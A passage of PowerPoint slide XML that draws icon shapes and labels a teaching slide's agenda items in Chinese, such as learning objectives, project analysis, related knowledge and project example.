                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="49" name="组合 48"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="672" y="3092"/>
              <a:ext cx="14823" cy="4347"/>
              <a:chOff x="672" y="3092"/>
              <a:chExt cx="14823" cy="4347"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="19" name="Group 20"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="10984" y="3092"/>
                <a:ext cx="2054" cy="3685"/>
                <a:chOff x="9539460" y="2484779"/>
                <a:chExt cx="1304471" cy="2340121"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="20" name="Group 21"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9539460" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="23" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent5"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="24" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="21" name="Oval 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9904781" y="4239008"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="22" name="AutoShape 59"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10027260" y="4362838"/>
                  <a:ext cx="328869" cy="328308"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10794 23"/>
                    <a:gd name="T1" fmla="*/ T0 w 21543"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T3" fmla="+- 0 10794 23"/>
                    <a:gd name="T4" fmla="*/ T3 w 21543"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T6" fmla="+- 0 10794 23"/>
                    <a:gd name="T7" fmla="*/ T6 w 21543"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T9" fmla="+- 0 10794 23"/>
                    <a:gd name="T10" fmla="*/ T9 w 21543"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T7" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21543" h="21600">
                      <a:moveTo>
                        <a:pt x="16976" y="19986"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="11226" y="17680"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="11088" y="17626"/>
                        <a:pt x="10946" y="17608"/>
                        <a:pt x="10806" y="17600"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19660" y="3837"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="19660" y="3837"/>
                        <a:pt x="16976" y="19986"/>
                        <a:pt x="16976" y="19986"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="6859" y="16244"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6858" y="16242"/>
                        <a:pt x="6855" y="16240"/>
                        <a:pt x="6854" y="16238"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19606" y="2552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8735" y="19536"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8735" y="19536"/>
                        <a:pt x="6859" y="16244"/>
                        <a:pt x="6859" y="16244"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="2111" y="14024"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17712" y="3595"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6369" y="15770"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6309" y="15734"/>
                        <a:pt x="6256" y="15687"/>
                        <a:pt x="6190" y="15660"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6190" y="15660"/>
                        <a:pt x="2111" y="14024"/>
                        <a:pt x="2111" y="14024"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="21234" y="108"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="21123" y="35"/>
                        <a:pt x="20996" y="0"/>
                        <a:pt x="20868" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20738" y="0"/>
                        <a:pt x="20608" y="36"/>
                        <a:pt x="20495" y="113"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="299" y="13613"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="13751"/>
                        <a:pt x="-23" y="13995"/>
                        <a:pt x="3" y="14244"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="14494"/>
                        <a:pt x="190" y="14708"/>
                        <a:pt x="422" y="14801"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5689" y="16914"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8166" y="21259"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8284" y="21468"/>
                        <a:pt x="8505" y="21597"/>
                        <a:pt x="8743" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8751" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8987" y="21599"/>
                        <a:pt x="9206" y="21474"/>
                        <a:pt x="9328" y="21271"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10726" y="18934"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17253" y="21551"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="17332" y="21584"/>
                        <a:pt x="17418" y="21599"/>
                        <a:pt x="17502" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17617" y="21599"/>
                        <a:pt x="17731" y="21571"/>
                        <a:pt x="17832" y="21512"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18010" y="21412"/>
                        <a:pt x="18133" y="21238"/>
                        <a:pt x="18167" y="21035"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="21533" y="785"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21576" y="520"/>
                        <a:pt x="21459" y="254"/>
                        <a:pt x="21234" y="108"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solid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sp>
            <p:nvSpPr>
              <p:cNvPr id="64" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="672" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" dirty="0"/>
                  <a:t>学习目标</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="67" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3020" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目分析</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="70" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5759" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>相关知识</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="73" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8551" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实例</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="76" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11344" y="6929"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
